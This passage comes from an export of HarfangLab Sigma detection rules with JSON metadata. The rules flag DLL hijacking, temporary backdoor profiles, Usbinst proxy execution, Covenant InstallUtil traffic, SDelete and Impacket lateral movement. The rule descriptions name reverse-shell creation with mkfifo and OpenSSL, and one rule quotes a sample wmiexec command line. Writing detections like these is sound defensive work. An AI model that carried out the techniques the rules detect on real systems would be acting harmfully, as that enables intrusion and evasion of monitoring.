the execution of mkfifo or mknod.\nBoth utilities can be used to create a FIFO file, a special kind of file that can be processed by two process at the same time (one writing to it and the other one reading it).\nAdversaries can create FIFO files in combination with openssl_client to create a reverse shell.\nIt is recommended to investigate the process that ran mkfifo/mknod and its execution context to determine if this action was legitimate.\n", + "rule_creation_date": "2023-12-15", + "rule_modified_date": "2026-01-23", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1559" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0fd65b55-ba18-4a16-86bb-19fdfaeb3e37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.079326Z", + "creation_date": "2026-03-23T11:45:34.079328Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.079332Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + 
"https://answers.microsoft.com/en-us/windows/forum/all/windows-temporary-user-profile-temp-issue/5fbefc7c-0b82-4395-bfda-6d7e2ebeacc6", + "https://attack.mitre.org/techniques/T1136/001/", + "https://attack.mitre.org/techniques/T1070/004/" + ], + "name": "t1070_004_temporary_user_profile_creation.yml", + "content": "title: Temporary User Profile Created\nid: 0fd65b55-ba18-4a16-86bb-19fdfaeb3e37\ndescription: |\n Detects the creation of a temporary user profile.\n A temporary profile is created each time an error condition prevents the user profile from loading.\n Temporary profiles are deleted at the end of each session, and changes made by the user to desktop settings and files are lost when the user logs off.\n A temporary profile is created in \"C:\\Users\\TEMP\" instead of the standard user profile folder \"C:\\Users\\\".\n An attacker can create this kind of user profile as a backdoor account to erase their tracks automatically after a log off.\n It is recommended to investigate the actions that this temporary user may have taken to determine whether this action was legitimate.\nreferences:\n - https://answers.microsoft.com/en-us/windows/forum/all/windows-temporary-user-profile-temp-issue/5fbefc7c-0b82-4395-bfda-6d7e2ebeacc6\n - https://attack.mitre.org/techniques/T1136/001/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/03/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Users\\TEMP\\NTUSER.DAT'\n\n exclusion_microsoftsearchinbing:\n Image: '?:\\Program Files (x86)\\Microsoft\\Microsoft Search in Bing\\MicrosoftSearchInBing.exe'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n Image: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_msiexec:\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_symantec:\n ProcessImage|startswith: '?:\\Program Files\\Symantec\\Symantec Endpoint Protection\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "0fd65b55-ba18-4a16-86bb-19fdfaeb3e37", + "rule_name": "Temporary User Profile Created", + "rule_description": "Detects the creation of a temporary user profile.\nA temporary profile is created each time an error condition prevents the user profile from loading.\nTemporary profiles are deleted at the end of each session, and changes made by the user to desktop settings and files are lost when the user logs off.\nA temporary profile is created in \"C:\\Users\\TEMP\" instead of the standard user profile folder \"C:\\Users\\\".\nAn attacker can create this kind of user profile as a backdoor account to erase their tracks automatically after a log off.\nIt is recommended to investigate the actions that this temporary user may have taken to determine whether this action was legitimate.\n", + "rule_creation_date": "2023-03-08", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1070.004", + "attack.t1136.001" + ], + "warnings": null, + "errors": 
null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "10614140-6f5c-442a-b818-e7f6202dc54a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.598780Z", + "creation_date": "2026-03-23T11:45:34.598784Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.598791Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://wietze.github.io/blog/save-the-environment-variables", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_msedge.yml", + "content": "title: DLL Hijacking via msedge.exe\nid: 10614140-6f5c-442a-b818-e7f6202dc54a\ndescription: |\n Detects potential Windows DLL Hijacking via msedge.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious 
content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msedge.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\explorerframe.dll'\n - '\\fastprox.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\ntmarta.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\windowsudk.shellcommon.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\SysWOW64\\\\wbem\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\System32\\\\wbem\\'\n 
- '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\WinSxS\\\\wbem\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "10614140-6f5c-442a-b818-e7f6202dc54a", + "rule_name": "DLL Hijacking via msedge.exe", + "rule_description": "Detects potential Windows DLL Hijacking via msedge.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "106504ea-01dd-41ce-a381-3e8f27c77ff0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": 
false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.077409Z", + "creation_date": "2026-03-23T11:45:34.077411Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.077415Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/api0cradle/LOLBAS/blob/master/OtherBinaries/Usbinst.md", + "https://attack.mitre.org/techniques/T1218/" + ], + "name": "t1218_usbinst.yml", + "content": "title: Proxy Execution via Usbinst\nid: 106504ea-01dd-41ce-a381-3e8f27c77ff0\ndescription: |\n Detects a suspicious execution of Citrix Usbinst.exe to proxy execution of malicious code.\n This binary, which is signed by Citrix, can be used to start malicious binaries whose inf file is passed as a parameter to usbinst.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to use a \"File download\" job to donwload and analyze the .inf file present in the command-line for malicious content.\nreferences:\n - https://github.com/api0cradle/LOLBAS/blob/master/OtherBinaries/Usbinst.md\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # By default C:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\Usbinst.exe\n - OriginalFileName: 'USBINST.EXE'\n - Image|endswith: '\\usbinst.exe'\n\n selection_arg:\n CommandLine|contains|all:\n - ' InstallHinfSection'\n - 'DefaultInstall'\n\n exclusion_citrix:\n - Image|endswith:\n - '\\Drivers64\\usbinst.exe'\n - '\\Devices64\\usbinst.exe'\n Signed: 
'true'\n Signature: 'Citrix Systems, Inc.'\n - CommandLine|contains:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Receiver\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\AppDataProtection\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\AppDataProtection\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Devices64\\ctxusbm\\ctxusbmon.inf'\n\n condition: selection and selection_arg and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "106504ea-01dd-41ce-a381-3e8f27c77ff0", + "rule_name": "Proxy Execution via Usbinst", + "rule_description": "Detects a suspicious execution of Citrix Usbinst.exe to proxy execution of malicious code.\nThis binary, which is signed by Citrix, can be used to start malicious binaries whose inf file is passed as a parameter to usbinst.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to use a \"File download\" job to donwload and analyze the .inf file present in the command-line for malicious content.\n", + "rule_creation_date": "2022-12-04", + "rule_modified_date": "2025-11-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + 
"rule_technique_tags": [ + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "108163b7-c707-4764-bf00-b43b3ae7e56d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.080094Z", + "creation_date": "2026-03-23T11:45:34.080096Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.080100Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/cobbr/Covenant", + "https://attack.mitre.org/techniques/T1218/004/", + "https://attack.mitre.org/techniques/T1071/001/" + ], + "name": "t1218_004_installutil_suspicious_network_communication.yml", + "content": "title: Suspicious InstallUtil.exe Network Communication\nid: 108163b7-c707-4764-bf00-b43b3ae7e56d\ndescription: |\n Detects a suspicious network communication from InstallUtil.exe.\n Attackers have used InstallUtil in the past to execute a malicious Beacon stager. 
It is commonly used for the Covenant Framework InstallUtil launcher.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate all InstallUtil.exe network connections, correlate with process execution logs and .NET assembly loads, and terminate any suspicious communications.\nreferences:\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/004/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2021/11/10\nmodified: 2025/05/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.004\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n - Image|endswith: '\\InstallUtil.exe'\n - ProcessOriginalFileName: 'InstallUtil.exe'\n\n exclusion_localhost:\n DestinationIp:\n - '127.0.0.1'\n - '::1'\n\n exclusion_programfiles:\n ProcessCommandLine|contains:\n - '\\InstallUtil.exe *:\\Program Files\\'\n - '\\InstallUtil.exe *:\\Program Files (x86)\\'\n\n exclusion_archimed:\n - ProcessParentImage: '?:\\Program Files (x86)\\Archimed\\Elise\\EliseInstallUninstall.exe'\n - ProcessParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4\\\\*'\n - ProcessCurrentDirectory:\n - '?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4'\n - '?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4\\'\n\n exclusion_devexpress:\n ProcessParentImage|endswith: '\\DevExpressComponents-*.exe'\n ProcessCommandLine|contains|all:\n - ' /LogFile='\n - ' /DemosDir='\n - ' /DemosName=Components '\n - '\\Components\\System\\Components\\DevExpress.DemosUpdater.dll'\n\n condition: selection and not 1 
of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "108163b7-c707-4764-bf00-b43b3ae7e56d", + "rule_name": "Suspicious InstallUtil.exe Network Communication", + "rule_description": "Detects a suspicious network communication from InstallUtil.exe.\nAttackers have used InstallUtil in the past to execute a malicious Beacon stager. It is commonly used for the Covenant Framework InstallUtil launcher.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate all InstallUtil.exe network connections, correlate with process execution logs and .NET assembly loads, and terminate any suspicious communications.\n", + "rule_creation_date": "2021-11-10", + "rule_modified_date": "2025-05-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1071", + "attack.t1218.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "108c4c3b-fe29-4e66-8036-5c56b0423fcb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.087529Z", + "creation_date": "2026-03-23T11:45:34.087532Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.087539Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx", + "https://attack.mitre.org/techniques/T1070/004/", + "https://attack.mitre.org/software/S0195/" + ], + "name": "t1070_004_sdelete.yml", + "content": "title: SDelete Tool Execution\nid: 108c4c3b-fe29-4e66-8036-5c56b0423fcb\ndescription: |\n Detects the execution of SDelete tool, an application that securely deletes data in a way that makes it unrecoverable.\n This tool is part of the Microsoft Sysinternals suite tools and is often used by attackers to removal files behind their malicious activities.\n It is recommended to analyze both the parent process and the deleted files to determine whether this action has legitimate intent.\nreferences:\n - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/software/S0195/\ndate: 2021/06/18\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.t1485\n - attack.s0195\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.SDelete\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '\\sdelete.exe'\n - '\\sdelete64.exe'\n OriginalFileName: 'sdelete.exe'\n\n exclusion_image:\n Image:\n - '?:\\ProgramData\\chocolatey\\bin\\sdelete.exe'\n - '?:\\Program Files (x86)\\Skidata\\ParkingSW\\\\*\\Tools\\sdelete.exe'\n\n exclusion_generic_scripts_folder:\n ProcessGrandparentCommandLine|startswith: 'cscript.exe 
\\\\\\\\*\\\\*$\\Scripts\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "108c4c3b-fe29-4e66-8036-5c56b0423fcb", + "rule_name": "SDelete Tool Execution", + "rule_description": "Detects the execution of SDelete tool, an application that securely deletes data in a way that makes it unrecoverable.\nThis tool is part of the Microsoft Sysinternals suite tools and is often used by attackers to removal files behind their malicious activities.\nIt is recommended to analyze both the parent process and the deleted files to determine whether this action has legitimate intent.\n", + "rule_creation_date": "2021-06-18", + "rule_modified_date": "2025-11-17", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1070.004", + "attack.t1485" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "10a3eb4c-d254-488d-843c-5e77fb2f6b4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.075752Z", + "creation_date": "2026-03-23T11:45:34.075754Z", 
+ "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.075759Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_drvinst.yml", + "content": "title: DLL Hijacking via drvinst.exe\nid: 10a3eb4c-d254-488d-843c-5e77fb2f6b4c\ndescription: |\n Detects potential Windows DLL Hijacking via drvinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'drvinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DEVRTL.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "10a3eb4c-d254-488d-843c-5e77fb2f6b4c", + "rule_name": "DLL Hijacking via drvinst.exe", + "rule_description": "Detects potential Windows DLL Hijacking via drvinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + 
"backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.628613Z", + "creation_date": "2026-03-23T11:45:34.628615Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.628619Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py", + "https://attack.mitre.org/software/S0357/" + ], + "name": "t1047_impacket_lateral_movement.yml", + "content": "title: Impacket Lateral Movement Detected\nid: 10c14723-61c7-4c75-92ca-9af245723ad2\ndescription: |\n Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.\n Impacket is a collection of Python classes for working with network protocols.\n Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself.\n It is often used by threat actors to perform lateral movements.\n It is recommended investigate the process tree for suspicious activities.\n Is is also recommended to investigate the network type authentications at the same time in order to get the IP address of the computer from which the lateral movement comes from.\nreferences:\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py\n - https://attack.mitre.org/software/S0357/\ndate: 2019/09/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.002\n - attack.t1021.003\n - attack.s0357\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Impacket\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_other:\n # *** wmiexec.py\n # parent is wmiprvse.exe\n # examples:\n # cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n # 